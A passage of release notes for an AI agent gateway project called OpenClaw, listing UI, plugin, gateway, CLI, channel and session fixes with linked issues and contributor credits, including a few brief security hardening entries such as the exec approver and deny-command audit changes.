<li>Control UI: keep Agents Overview and config-form select dropdowns on their configured value after options render while preserving inherited agent model placeholders. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042433661" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40352" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40352/hovercard" href="https://github.com/openclaw/openclaw/issues/40352">#40352</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4121542753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52948" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/52948/hovercard" href="https://github.com/openclaw/openclaw/pull/52948">#52948</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaoquanidea/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaoquanidea">@xiaoquanidea</a>.</li>
<li>Agents/exec: launch zsh, bash, and fish host exec shells with startup files suppressed while preserving existing PATH fallbacks, so daemon env is not overridden by shell startup files. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042016257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40200" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40200/hovercard" href="https://github.com/openclaw/openclaw/pull/40200">#40200</a>; fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041976066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40179" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40179/hovercard" href="https://github.com/openclaw/openclaw/issues/40179">#40179</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NewdlDewdl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NewdlDewdl">@NewdlDewdl</a>.</li>
<li>Plugins/QA: prebuild the private QA channel runtime before plugin gauntlet source runs so wrapper CPU/RSS measurements are not polluted by private QA dist rebuild work. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QA: add a Kitchen Sink plugin gauntlet that installs the external package, checks command inventory, MCP tools, channel status, provider turns, gateway RSS, CPU, and fatal log anomalies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/config: reuse the bundled plugin alias scan within a single config normalization pass, so Kitchen Sink-style plugin configs no longer peg Gateway CPU by repeatedly rescanning bundled metadata before agent turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: reject malformed runtime channel registrations that omit required config helpers before they can poison channel status. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/plugins: serialize raw plugin tool return values through the plugin-tools MCP bridge so Kitchen Sink-style tools no longer surface <code>undefined</code> content. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/reload: bound default restart deferral and SIGUSR1 restart drain to five minutes while preserving explicit <code>deferralTimeoutMs: 0</code> indefinite waits, so stale active work accounting cannot block config reloads forever. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: register the prompt-build hook with the configured recall timeout plus setup grace instead of the 150s maximum budget, so default memory recall cannot delay turn startup for multiple minutes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/readiness: include an <code>eventLoop</code> diagnostic block in local or authenticated <code>/readyz</code> responses with event-loop delay (p99 and max), event-loop utilization, CPU core ratio, and a <code>degraded</code> flag, so operators can see when slow startups or runaway turns stall the event loop. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/agents: schedule accepted agent runs after the accepted RPC frame has a chance to flush, so pre-turn prompt/context work is less likely to starve immediate <code>agent.wait</code> callers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: tolerate stale memory-runtime import failures during best-effort CLI process teardown, so <code>openclaw update</code> replacing hashed runtime chunks before the finalizer runs no longer surfaces as exit-time <code>Cannot find module</code> noise. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/channels logs: reuse the rolling log-file resolver so <code>openclaw channels logs</code> falls back to the active dated log across date boundaries without reading unrelated custom log files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056125824" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42875" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42875/hovercard" href="https://github.com/openclaw/openclaw/issues/42875">#42875</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056258292" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42904/hovercard" href="https://github.com/openclaw/openclaw/pull/42904">#42904</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057041029" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43043" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43043/hovercard" href="https://github.com/openclaw/openclaw/pull/43043">#43043</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethanclaw">@ethanclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wdskuki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wdskuki">@wdskuki</a>.</li>
<li>CLI/update: skip tracked plugins disabled in config during post-update plugin sync before npm, ClawHub, or marketplace update checks, preserving their install records without failing the update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347036954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73880" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73880/hovercard" href="https://github.com/openclaw/openclaw/issues/73880">#73880</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/islandpreneur007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/islandpreneur007">@islandpreneur007</a>.</li>
<li>Control UI: fix Peak Error Hours showing incorrect hourly rates when the browser's timezone observes DST, by storing hourly message counts with UTC date keys and using DST-aware <code>Date.getHours()</code> for local conversion. Also extract <code>accumulateMessageCounts</code> helper to reduce duplicated daily/hourly aggregation logic. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4092402816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49396" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49396/hovercard" href="https://github.com/openclaw/openclaw/pull/49396">#49396</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</li>
<li>iMessage: normalize known leading attributedBody corruption markers on sent-message echo text keys so delayed reflected echoes with U+FFFD/U+FFFE/U+FFFF/FEFF prefixes are dropped without collapsing interior text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197665190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59973" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59973/hovercard" href="https://github.com/openclaw/openclaw/issues/59973">#59973</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197722194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59980" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59980/hovercard" href="https://github.com/openclaw/openclaw/pull/59980">#59980</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214583433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62191/hovercard" href="https://github.com/openclaw/openclaw/pull/62191">#62191</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maguilar631697/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maguilar631697">@maguilar631697</a>.</li>
<li>Security/audit: recognize dangerous node command IDs as valid <code>gateway.nodes.denyCommands</code> entries, so audit only warns on real typos or unsupported patterns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163604946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56923" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56923/hovercard" href="https://github.com/openclaw/openclaw/pull/56923">#56923</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chziyue/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chziyue">@chziyue</a>.</li>
<li>Cron: treat implicit text payloads with agent-turn overrides as agent turns, preserving model overrides for scheduled text prompts instead of pruning them as system events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001694353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/28905" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/28905/hovercard" href="https://github.com/openclaw/openclaw/issues/28905">#28905</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236386081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64060" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64060/hovercard" href="https://github.com/openclaw/openclaw/pull/64060">#64060</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liaoandi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liaoandi">@liaoandi</a>.</li>
<li>Telegram/exec approvals: stop treating general Telegram chat allowlists and <code>defaultTo</code> routes as native exec approvers; Telegram now uses explicit <code>execApprovals.approvers</code> or owner identity from <code>commands.ownerAllowFrom</code>, matching the first-pairing owner bootstrap path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugins/providers: keep Gateway startup primary-model discovery on metadata-only provider entries and reuse active non-speech capability providers even with explicit plugin entries, avoiding unnecessary provider registry loads during startup and media capability checks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345357678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73729" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73729/hovercard" href="https://github.com/openclaw/openclaw/issues/73729">#73729</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346570757" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73835/hovercard" href="https://github.com/openclaw/openclaw/issues/73835">#73835</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346027613" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73793" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73793/hovercard" href="https://github.com/openclaw/openclaw/issues/73793">#73793</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346797079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73853" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73853/hovercard" href="https://github.com/openclaw/openclaw/pull/73853">#73853</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346030125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73794/hovercard" href="https://github.com/openclaw/openclaw/pull/73794">#73794</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sg1416-zg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sg1416-zg">@sg1416-zg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/poolside-ventures/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/poolside-ventures">@poolside-ventures</a>.</li>
<li>Chat commands: route sensitive group <code>/diagnostics</code> and <code>/export-trajectory</code> approvals and results to a private owner route, preferring same-surface DMs before falling back to the first configured owner route, so Discord group invocations can land in Telegram when that is the primary owner interface. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Gateway/hooks: keep successful <code>deliver:false</code> agent hooks silent, log a hook audit record for suppressed success announcements, and suppress fallback summaries after attempted hook delivery while still surfacing failed hook runs. Repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4151948578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55761" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55761/hovercard" href="https://github.com/openclaw/openclaw/pull/55761">#55761</a>; builds on <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028886435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/36332/hovercard" href="https://github.com/openclaw/openclaw/pull/36332">#36332</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091099015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49234" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49234/hovercard" href="https://github.com/openclaw/openclaw/pull/49234">#49234</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EffortlessSteven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EffortlessSteven">@EffortlessSteven</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cioclawcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cioclawcode">@cioclawcode</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrennerSpear/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrennerSpear">@BrennerSpear</a>.</li>
<li>Plugin SDK/Discord: restore a deprecated <code>openclaw/plugin-sdk/discord</code> compatibility facade and the legacy compat group-policy warning export for the published <code>@openclaw/discord@2026.3.13</code> package, covering its config, account, directory, status, and thread-binding imports while keeping new plugins on generic SDK subpaths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344804450" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73685/hovercard" href="https://github.com/openclaw/openclaw/issues/73685">#73685</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345028871" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73703" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73703/hovercard" href="https://github.com/openclaw/openclaw/pull/73703">#73703</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rderickson9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rderickson9">@rderickson9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Discord: suppress duplicate gateway monitors when multiple enabled accounts resolve to the same bot token, preferring config tokens over default env fallback and reporting skipped duplicates as disabled. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344054955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73608" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73608/hovercard" href="https://github.com/openclaw/openclaw/pull/73608">#73608</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kagura-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kagura-agent">@kagura-agent</a>.</li>
<li>CLI/health: build channel health summaries from inspected credential metadata plus runtime state, so <code>openclaw health --json</code> reports Discord <code>running</code>, <code>connected</code>, and <code>tokenSource</code> consistently with channel status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066903951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44354" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44354/hovercard" href="https://github.com/openclaw/openclaw/issues/44354">#44354</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ferenc-acs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ferenc-acs">@ferenc-acs</a>.</li>
<li>Control UI/Talk: decode Google Live binary WebSocket JSON frames and stop queued browser audio on interruption or shutdown, so browser Talk leaves <code>Connecting Talk...</code> and barge-in no longer plays stale audio. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342101919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73460/hovercard" href="https://github.com/openclaw/openclaw/issues/73460">#73460</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342138204" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73466/hovercard" href="https://github.com/openclaw/openclaw/pull/73466">#73466</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>.</li>
<li>Channels/Discord: ignore stale route-shaped conversation bindings after a Discord channel is reconfigured to another agent, while preserving explicit focus and subagent bindings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344233247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73626/hovercard" href="https://github.com/openclaw/openclaw/issues/73626">#73626</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ramitrkar-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ramitrkar-hash">@ramitrkar-hash</a>.</li>
<li>Agents/bootstrap: pass pending BOOTSTRAP.md contents through the first-run user prompt while keeping them out of privileged system context, and show limited bootstrap guidance when workspace file access is unavailable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344203540" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73622" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73622/hovercard" href="https://github.com/openclaw/openclaw/issues/73622">#73622</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mark1010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mark1010">@mark1010</a>.</li>
<li>ACP/tasks: classify parent-owned ACP sessions as background work regardless of persistent runtime mode, and close terminal stale ACP sessions when no active binding remains, so delegated ACP output reports through the parent task notifier instead of acting like a normal foreground chat session. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Tasks: keep terminal mirrored TaskFlow timestamps pinned to task completion time and let maintenance repair stale mirrors, so ACP terminal delivery updates no longer leave inconsistent flow audits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344064139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73609" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73609/hovercard" href="https://github.com/openclaw/openclaw/issues/73609">#73609</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Gateway/sessions: add conservative stuck-session recovery that releases only stale session lanes while active embedded runs, reply operations, and lane tasks remain serialized, so queued follow-ups can drain without aborting legitimate long-running turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343463353" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73581/hovercard" href="https://github.com/openclaw/openclaw/issues/73581">#73581</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344463460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73655/hovercard" href="https://github.com/openclaw/openclaw/issues/73655">#73655</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344421059" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73652/hovercard" href="https://github.com/openclaw/openclaw/issues/73652">#73652</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345057984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73705/hovercard" href="https://github.com/openclaw/openclaw/issues/73705">#73705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343892445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73602" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73602/hovercard" href="https://github.com/openclaw/openclaw/issues/73602">#73602</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343737030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73592" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73592/hovercard" href="https://github.com/openclaw/openclaw/issues/73592">#73592</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343876260" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73601/hovercard" href="https://github.com/openclaw/openclaw/issues/73601">#73601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WS-Q0758/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WS-Q0758">@WS-Q0758</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bryangauvin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bryangauvin">@bryangauvin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spenceryang1996-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spenceryang1996-dot">@spenceryang1996-dot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bmilne1981/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bmilne1981">@bmilne1981</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mattmcintyre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mattmcintyre">@mattmcintyre</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vksh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vksh07">@Vksh07</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Spolen23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Spolen23">@Spolen23</a>.</li>
<li>Plugins: cache unchanged plugin manifest loads by file signature, reducing repeated JSON/JSON5 parsing and manifest normalization in bursty startup and runtime registry paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344394559" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73647" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73647/hovercard" href="https://github.com/openclaw/openclaw/issues/73647">#73647</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344765997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73678/hovercard" href="https://github.com/openclaw/openclaw/pull/73678">#73678</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TheDutchRuler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TheDutchRuler">@TheDutchRuler</a>.</li>
